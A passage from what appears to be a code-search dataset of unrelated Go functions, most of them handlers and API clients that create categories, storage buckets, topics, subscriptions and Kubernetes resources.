http.StatusOK {\n\t\t\t\tw.WriteHeader(resCode)\n\t\t\t\tresponse = resString\n\t\t\t} else {\n\t\t\t\tresult := database.CreateCategory(newCategory, database.CategoriesTableToEdit)\n\t\t\t\tif result {\n\t\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t\t\t\t\tw.WriteHeader(http.StatusCreated)\n\t\t\t\t\tresponse = response + \" Category created for Segment\"\n\t\t\t\t} else {\n\t\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t\t\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\t\t\tresponse = response + \" Could not create Category for Segment\"\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tfmt.Fprintf(w, \"%s\", response)\n}", "func CategoriesCreateGET(c *gin.Context) {\n\ttypeMethod := c.Param(\"type\")\n\tCategory := strings.Title(strings.Replace(typeMethod, \"-\", \" \", -1))\n\trepo := dataservice.NewCategoriesRepo()\n\tlistCategory := repo.GetListCategories(typeMethod)\n\tTitle := \"Create Category \" + Category\n\tc.HTML(http.StatusOK, \"CategoriesCreate\", gin.H{\"Title\": Title, \"typeMethod\": typeMethod, \"Category\": Category, \"listCategory\": listCategory})\n}", "func CreateCreateTopicResponse() (response *CreateTopicResponse) {\n\tresponse = &CreateTopicResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func (d *DestinationClient) CreateSubaccountDestination(newDestination Destination) error {\n\n\tvar errResponse ErrorMessage\n\n\tresponse, err := d.restyClient.R().\n\t\tSetBody(newDestination).\n\t\tSetError(&errResponse).\n\t\tPost(\"/subaccountDestinations\")\n\n\tif err != nil {\n\t\treturn err\n\t}\n\tif response.StatusCode() != 201 {\n\t\terrResponse.statusCode = response.StatusCode()\n\t\treturn errResponse\n\t}\n\treturn nil\n}", "func CategoryCreate(c *gin.Context) {\n\tCategory := &models.Category{}\n\tif err := c.Bind(Category); err != nil {\n\t\tsession := sessions.Default(c)\n\t\tsession.AddFlash(err.Error())\n\t\tsession.Save()\n\t\tc.Redirect(http.StatusSeeOther, \"/admin/new_Category\")\n\t\treturn\n\t}\n\n\tif err := Category.Insert(); err != nil {\n\t\tc.HTML(http.StatusInternalServerError, \"errors/500\", nil)\n\t\tlogrus.Error(err)\n\t\treturn\n\t}\n\tc.Redirect(http.StatusFound, \"/admin/categories\")\n}", "func (categories *Categories) CreateCategory(category Category, language string) (Category, error) {\n\texistsCategories, err := categories.ReadCategoriesByName(category.Name, language)\n\tif err != nil && err != ErrCategoriesByNameNotFound {\n\t\tlog.Println(err)\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\tif existsCategories != nil {\n\t\treturn existsCategories[0], ErrCategoryAlreadyExist\n\t}\n\n\ttransaction := categories.storage.Client.NewTxn()\n\n\tcategory.IsActive = true\n\tencodedCategory, err := json.Marshal(category)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\n\tmutation := &dataBaseAPI.Mutation{\n\t\tSetJson: encodedCategory,\n\t\tCommitNow: true}\n\n\tassigned, err := transaction.Mutate(context.Background(), mutation)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\n\tcategory.ID = assigned.Uids[\"blank-0\"]\n\tif category.ID == \"\" {\n\t\treturn category, ErrCategoryCanNotBeCreated\n\t}\n\n\terr = categories.AddLanguageOfCategoryName(category.ID, category.Name, language)\n\tif err != nil {\n\t\treturn category, err\n\t}\n\n\tcreatedCategory, err := categories.ReadCategoryByID(category.ID, language)\n\tif err != nil {\n\t\treturn category, err\n\t}\n\n\treturn createdCategory, nil\n}", "func (service *Service) CreateCategory(req *CreateRequest) (*CreateResponse, error) {\n\tcategoryExists, err := service.repo.CheckCategoryNameExists(req.Name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif categoryExists {\n\t\treturn nil, errors.New(utils.CategoryExistsError)\n\t}\n\tcategory, err := service.repo.CreateCategory(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn category, nil\n}", "func (t Team) CreateSubteam(name string) (TeamAPI, error) {\n\tm := TeamAPI{\n\t\tParams: &tParams{},\n\t}\n\tm.Method = \"create-team\"\n\tm.Params.Options.Team = fmt.Sprintf(\"%s.%s\", t.Name, name)\n\n\tr, err := teamAPIOut(t.keybase, m)\n\treturn r, err\n}", "func CreateBucket(w http.ResponseWriter, r *http.Request) *appError {\n decoder := json.NewDecoder(r.Body)\n var ecsBucket ECSBucket\n err := decoder.Decode(&ecsBucket)\n if err != nil {\n return &appError{err: err, status: http.StatusBadRequest, json: \"Can't decode JSON data\"}\n }\n headers := make(map[string][]string)\n if ecsBucket.ReplicationGroup != \"\" {\n headers[\"x-emc-vpool\"] = []string{ecsBucket.ReplicationGroup}\n }\n if ecsBucket.MetadataSearch != \"\" {\n headers[\"x-emc-metadata-search\"] = []string{ecsBucket.MetadataSearch}\n }\n if ecsBucket.EnableADO {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"false\"}\n }\n if ecsBucket.EnableFS {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableCompliance {\n headers[\"x-emc-compliance-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-compliance-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableEncryption {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"false\"}\n }\n retentionEnabled := false\n headers[\"x-emc-retention-period\"] = []string{\"0\"}\n if ecsBucket.Retention != \"\" {\n days, err := strconv.ParseInt(ecsBucket.Retention, 10, 64)\n if err == nil {\n if days > 0 {\n seconds := days * 24 * 3600\n headers[\"x-emc-retention-period\"] = []string{int64toString(seconds)}\n retentionEnabled = true\n }\n }\n }\n var expirationCurrentVersions int64\n expirationCurrentVersions = 0\n if ecsBucket.ExpirationCurrentVersions != \"\" {\n days, err := strconv.ParseInt(ecsBucket.ExpirationCurrentVersions, 10, 64)\n if err == nil {\n expirationCurrentVersions = days\n }\n }\n var expirationNonCurrentVersions int64\n expirationNonCurrentVersions = 0\n if ecsBucket.ExpirationNonCurrentVersions != \"\" {\n days, err := strconv.ParseInt(ecsBucket.ExpirationNonCurrentVersions, 10, 64)\n if err == nil && ecsBucket.EnableVersioning {\n expirationNonCurrentVersions = days\n }\n }\n var bucketCreateResponse Response\n if ecsBucket.Api == \"s3\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = s3Request(s3, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n versioningStatusOK := true\n lifecyclePolicyStatusOK := true\n // If the bucket has been created\n if bucketCreateResponse.Code == 200 {\n if !retentionEnabled && ecsBucket.EnableVersioning {\n // Enable versioning\n enableVersioningHeaders := map[string][]string{}\n enableVersioningHeaders[\"Content-Type\"] = []string{\"application/xml\"}\n versioningConfiguration := `\n <VersioningConfiguration xmlns=\"http://s3.amazonaws.com/doc/2006-03-01/\">\n <Status>Enabled</Status>\n <MfaDelete>Disabled</MfaDelete>\n </VersioningConfiguration>\n `\n enableVersioningResponse, _ := s3Request(s3, ecsBucket.Name, \"PUT\", \"/?versioning\", enableVersioningHeaders, versioningConfiguration)\n if enableVersioningResponse.Code != 200 {\n versioningStatusOK = false\n }\n }\n if expirationCurrentVersions > 0 || expirationNonCurrentVersions > 0 {\n lifecyclePolicyHeaders := map[string][]string{}\n lifecyclePolicyHeaders[\"Content-Type\"] = []string{\"application/xml\"}\n lifecyclePolicyConfiguration := `\n <LifecycleConfiguration>\n <Rule>\n <ID>expiration</ID>\n <Prefix></Prefix>\n <Status>Enabled</Status>\n `\n if expirationCurrentVersions > 0 && expirationNonCurrentVersions > 0 {\n // Enable expiration for both current and non current versions\n lifecyclePolicyConfiguration += \"<Expiration><Days>\" + ecsBucket.ExpirationCurrentVersions + \"</Days></Expiration>\"\n lifecyclePolicyConfiguration += \"<NoncurrentVersionExpiration><NoncurrentDays>\" + ecsBucket.ExpirationNonCurrentVersions + \"</NoncurrentDays></NoncurrentVersionExpiration>\"\n } else {\n if expirationCurrentVersions > 0 {\n // Enable expiration for current versions only\n lifecyclePolicyConfiguration += \"<Expiration><Days>\" + ecsBucket.ExpirationCurrentVersions + \"</Days></Expiration>\"\n }\n if expirationNonCurrentVersions > 0 {\n // Enable expiration for non current versions only\n // To fix a bug in ECS 3.0 where an expiration for non current version can't be set if there's no expiration set for current versions\n lifecyclePolicyConfiguration += \"<Expiration><Days>1000000</Days></Expiration>\"\n lifecyclePolicyConfiguration += \"<NoncurrentVersionExpiration><NoncurrentDays>\" + ecsBucket.ExpirationNonCurrentVersions + \"</NoncurrentDays></NoncurrentVersionExpiration>\"\n }\n }\n lifecyclePolicyConfiguration += `\n </Rule>\n </LifecycleConfiguration>\n `\n lifecyclePolicyResponse, _ := s3Request(s3, ecsBucket.Name, \"PUT\", \"/?lifecycle\", lifecyclePolicyHeaders, lifecyclePolicyConfiguration)\n if lifecyclePolicyResponse.Code != 200 {\n lifecyclePolicyStatusOK = false\n }\n }\n if versioningStatusOK && lifecyclePolicyStatusOK {\n rendering.JSON(w, http.StatusOK, \"\")\n } else {\n message := \"\"\n if !versioningStatusOK {\n message += \" Versioning can't be enabled.\"\n }\n if !lifecyclePolicyStatusOK {\n message += \" Expiration can't be set.\"\n }\n rendering.JSON(w, http.StatusOK, message)\n }\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"swift\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = swiftRequest(ecsBucket.Endpoint, s3.AccessKey, ecsBucket.Password, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"atmos\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = atmosRequest(ecsBucket.Endpoint, s3.AccessKey, s3.SecretKey, \"\", \"PUT\", \"/rest/subtenant\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, bucketCreateResponse.ResponseHeaders[\"Subtenantid\"][0])\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n }\n\n return nil\n}", "func NewEventSubcategoryWithDefaults() *EventSubcategory {\n\tthis := EventSubcategory{}\n\treturn &this\n}", "func CreateBucket(w http.ResponseWriter, r *http.Request) *appError {\n decoder := json.NewDecoder(r.Body)\n var ecsBucket ECSBucket\n err := decoder.Decode(&ecsBucket)\n if err != nil {\n return &appError{err: err, status: http.StatusBadRequest, json: \"Can't decode JSON data\"}\n }\n headers := make(map[string][]string)\n if ecsBucket.ReplicationGroup != \"\" {\n headers[\"x-emc-vpool\"] = []string{ecsBucket.ReplicationGroup}\n }\n if ecsBucket.MetadataSearch != \"\" {\n headers[\"x-emc-metadata-search\"] = []string{ecsBucket.MetadataSearch}\n }\n if ecsBucket.EnableADO {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"false\"}\n }\n if ecsBucket.EnableFS {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableCompliance {\n headers[\"x-emc-compliance-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-compliance-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableEncryption {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"false\"}\n }\n var bucketCreateResponse Response\n if ecsBucket.Api == \"s3\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = s3Request(s3, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code == 200 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"swift\" {\n bucketCreateResponse, err = swiftRequest(ecsBucket.Endpoint, ecsBucket.User, ecsBucket.Password, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n log.Print(bucketCreateResponse)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"atmos\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = atmosRequest(ecsBucket.Endpoint, s3.AccessKey, s3.SecretKey, \"\", \"PUT\", \"/rest/subtenant\", headers, \"\")\n if err != nil {\n log.Print(err)\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, bucketCreateResponse.ResponseHeaders[\"Subtenantid\"][0])\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n }\n\n return nil\n}", "func (t *TrackingCategories) Create(provider xerogolang.IProvider, session goth.Session) (*TrackingCategories, error) {\n\tadditionalHeaders := map[string]string{\n\t\t\"Accept\": \"application/json\",\n\t\t\"Content-Type\": \"application/xml\",\n\t}\n\n\tbody, err := xml.MarshalIndent(t, \" \", \"\t\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ttrackingCategoryResponseBytes, err := provider.Create(session, \"TrackingCategories\", additionalHeaders, body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn unmarshalTrackingCategory(trackingCategoryResponseBytes)\n}", "func NewEventSubcategory() *EventSubcategory {\n\tthis := EventSubcategory{}\n\treturn &this\n}", "func InitCategoriesTable(db *sql.DB) {\n\tstmt, _ := db.Prepare(`CREATE TABLE IF NOT EXISTS channelsCategories (\n\t\tid text,\n\t\tposition integer,\n\t\tname text,\n\t\tnsfw integer\n\t)`)\n\tstmt.Exec()\n}", "func (a *SubAccountApiService) CreateSubAccountKeys(ctx context.Context, userId int64, subAccountKey SubAccountKey) ([]SubAccountKey, *http.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = http.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue []SubAccountKey\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/sub_accounts/{user_id}/keys\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"user_id\"+\"}\", url.QueryEscape(parameterToString(userId, \"\")), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = &subAccountKey\n\tif ctx == nil {\n\t\tctx = context.Background()\n\t}\n\tif ctx.Value(ContextGateAPIV4) == nil {\n\t\t// for compatibility, set configuration key and secret to context if ContextGateAPIV4 value is not present\n\t\tctx = context.WithValue(ctx, ContextGateAPIV4, GateAPIV4{\n\t\t\tKey: a.client.cfg.Key,\n\t\t\tSecret: a.client.cfg.Secret,\n\t\t})\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status + \", \" + string(localVarBody),\n\t\t}\n\t\tvar gateErr GateAPIError\n\t\tif e := a.client.decode(&gateErr, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\")); e == nil && gateErr.Label != \"\" {\n\t\t\tgateErr.APIError = newErr\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, gateErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (co *SubResourceCreateOptions) ApplyToSubresourceCreate(o *SubResourceCreateOptions) {\n\tco.CreateOptions.ApplyToCreate(&co.CreateOptions)\n}", "func createNewUnstructuredClusterScoped(\n\tclientHubDynamic dynamic.Interface,\n\tgvr schema.GroupVersionResource,\n\tobj *unstructured.Unstructured,\n\tname string,\n) {\n\tklog.V(5).Infof(\"Creation Unstructured of %s %s\", gvr, name)\n\ts := clientHubDynamic.Resource(gvr)\n\tklog.V(5).Infof(\"ns created for %s %s created\", gvr, name)\n\tExpect(s.Create(context.TODO(), obj, metav1.CreateOptions{})).NotTo(BeNil())\n\tklog.V(5).Infof(\"Check if Unstructured %s %s created\", gvr, name)\n\tExpect(s.Get(context.TODO(), name, metav1.GetOptions{})).NotTo(BeNil())\n\tklog.V(5).Infof(\"Unstructured %s %s created\", gvr, name)\n}", "func CreateHCN(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar newHCN mymodels.HCN\n\treqBody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tfmt.Fprintf(w, err.Error())\n\t\treturn\n\t}\n\tjson.Unmarshal(reqBody, &newHCN)\n\n\t// Fields validation\n\tstructFields := []string{\"TeacherID\", \"MongoID\"} // struct fields to check\n\t_, err = newHCN.ValidateFields(structFields)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tfmt.Fprintf(w, err.Error())\n\t\treturn\n\t}\n\n\t// Data insertion into db\n\t_, err = dbHelper.Insert(newHCN)\n\tif err != nil {\n\t\tif strings.Split(err.Error(), \":\")[0] == \"(db 2) Error 1062\" {\n\t\t\tw.WriteHeader(http.StatusConflict)\n\t\t} else {\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t}\n\t\tfmt.Fprintf(w, err.Error())\n\t\treturn\n\t}\n\tw.WriteHeader(http.StatusCreated)\n\treturn\n}", "func NewLabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilderInternal(pathParameters map[string]string, requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter)(*LabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilder) {\n m := &LabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilder{\n BaseRequestBuilder: *i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.NewBaseRequestBuilder(requestAdapter, \"{+baseurl}/security/labels/categories/{categoryTemplate%2Did}/subCategories/{subCategoryTemplate%2Did}{?%24select,%24expand}\", pathParameters),\n }\n return m\n}", "func (a *Client) PostCategories(params *PostCategoriesParams) (*PostCategoriesCreated, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewPostCategoriesParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"post_categories\",\n\t\tMethod: \"POST\",\n\t\tPathPattern: \"/api/rest/v1/categories\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\"},\n\t\tParams: params,\n\t\tReader: &PostCategoriesReader{formats: a.formats},\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*PostCategoriesCreated)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\t// safeguard: normally, absent a default response, unknown success responses return an error above: so this is a codegen issue\n\tmsg := fmt.Sprintf(\"unexpected success response for post_categories: API contract not enforced by server. Client expected to get an error, but got: %T\", result)\n\tpanic(msg)\n}", "func createKustomization(releaseDirectory string) error {\n\tcontent := `resources:\n- release.yaml\n`\n\terr := ioutil.WriteFile(filepath.Join(releaseDirectory, \"kustomization.yaml\"), []byte(content), 0644) //nolint:gosec\n\tif err != nil {\n\t\treturn microerror.Mask(err)\n\t}\n\treturn nil\n}", "func HandleCreate(w http.ResponseWriter, r *http.Request) {\r\n\tCorsHandler(w)\r\n\tctx := context.Background()\r\n\r\n\tprojectID := GetEnvVar(\"GOOGLE_CLOUD_PROJECT\")\r\n\tclient, err := pubsub.NewClient(ctx, projectID)\r\n\tCheckError(w, \"Error Creating Client\", err)\r\n\tt, err := client.CreateTopic(ctx, \"top3\")\r\n\tCheckError(w, \"Error Creating topic\", err)\r\n\tfmt.Fprintf(w, \"Topic Created Successfully %s\", t)\r\n}", "func TestCreateCategoryWrongJSONSyntax(t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//parameters passed to request body\n\trequestBody := `{{\"CategoryID\":\"bq4fasj7jhfi127rimlg\",\"CategoryName\":\"Name\",,,}}`\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBufferString(requestBody))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 400, rr.Code, \"Bad request response is expected\")\n\tassert.Equal(t, initialLen, len(Categories), \"Expected length to stay the same after wrong syntax json\")\n\n}", "func (client NotificationDataPlaneClient) createSubscription(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPost, \"/subscriptions\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response CreateSubscriptionResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (a SubAccountClient) PostSubAccountNameChange(req *rest3.RequestForSubAccountChange) (rest3.ResponseForSubAccountChange, error) {\n\tpanic(\"implement me\")\n}", "func CreateConfig() *Config {\n return &Config{\n HeaderName: defaultHeader,\n }\n}", "func CreateCategories(c *gin.Context) {\n\t// Validate input\n\tvar input CreateCategoriesInput\n\tif err := c.ShouldBindJSON(&input); err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\"error\": err.Error()})\n\t\treturn\n\t}\n\n\t// Create categories\n\tcategories := models.Categories{Name: input.Name}\n\tmodels.DB.Create(&categories)\n\n\tc.JSON(http.StatusOK, gin.H{\"data\": categories})\n}", "func (c *CategoryClient) Create() *CategoryCreate {\n\tmutation := newCategoryMutation(c.config, OpCreate)\n\treturn &CategoryCreate{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func (o *AggregatedDomain) CreateTCA(child *TCA) *bambou.Error {\n\n\treturn bambou.CurrentSession().CreateChild(o, child)\n}", "func (t *TopicService) Create(name, description, parentID string) (*Topic, error) {\n\tquery := `\n\tmutation (\n\t\t$name: String!,\n\t\t$description: String,\n\t\t$parentId: ID\n\t){\n\t\tcreateTopic(\n\t\t\tname: $name, description: $description, parentId: $parentId\n\t\t){ id, name, description }\n\t}`\n\tvar resp struct {\n\t\tTopic *Topic `json:\"createTopic\"`\n\t}\n\tvars := map[string]interface{}{\"name\": name, \"description\": description, \"parentId\": parentID}\n\terr := t.client.Do(context.Background(), query, vars, &resp)\n\treturn resp.Topic, err\n}", "func NewLabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilder(rawUrl string, requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter)(*LabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilder) {\n urlParams := make(map[string]string)\n urlParams[\"request-raw-url\"] = rawUrl\n return NewLabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilderInternal(urlParams, requestAdapter)\n}", "func (s *Server) AddCategory(ctx context.Context, in *api.Category) (*api.MsgResponse, error) {\n\tlog.Printf(\"insert category with %v\", *in)\n\tb, err := json.Marshal(in)\n\tif err != nil {\n\t\treturn &api.MsgResponse{\n\t\t\tResponseMsg: \"FAILED\",\n\t\t}, err\n\t}\n\tc := make(chan ConfirmationMessage)\n\tfn := func(uid string, err error) {\n\t\tif err != nil {\n\t\t\tresp := ConfirmationMessage{\n\t\t\t\tresponse: \"ERROR\",\n\t\t\t\terr: err,\n\t\t\t}\n\t\t\tc <- resp\n\t\t} else {\n\t\t\tresp := ConfirmationMessage{\n\t\t\t\tresponse: uid,\n\t\t\t\terr: nil,\n\t\t\t}\n\t\t\tc <- resp\n\t\t}\n\t}\n\ts.MsgPublisher.PublishEvent(kcategoryChannelID, string(b), fn)\n\n\tif ret := <-c; ret.err != nil {\n\t\treturn &api.MsgResponse{\n\t\t\tResponseMsg: \"Error\",\n\t\t}, ret.err\n\t}\n\treturn &api.MsgResponse{\n\t\tResponseMsg: \"Created\",\n\t}, err\n}", "func (h *ResourceHeader) SetSubKind(s string) {\n\th.SubKind = s\n}", "func CreateCreateCustomCallTaggingResponse() (response *CreateCustomCallTaggingResponse) {\n\tresponse = &CreateCustomCallTaggingResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func (apiHandler *ApiHandler) handleCreateNamespace(request *restful.Request,\n\tresponse *restful.Response) {\n\tnamespaceSpec := new(NamespaceSpec)\n\tif err := request.ReadEntity(namespaceSpec); err != nil {\n\t\thandleInternalError(response, err)\n\t\treturn\n\t}\n\tif err := CreateNamespace(namespaceSpec, apiHandler.client); err != nil {\n\t\thandleInternalError(response, err)\n\t\treturn\n\t}\n\n\tresponse.WriteHeaderAndEntity(http.StatusCreated, namespaceSpec)\n}", "func (a *AdminApiService) PostCategories(ctx _context.Context, localVarOptionals *PostCategoriesOpts) (Category, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue Category\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/categories\"\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type 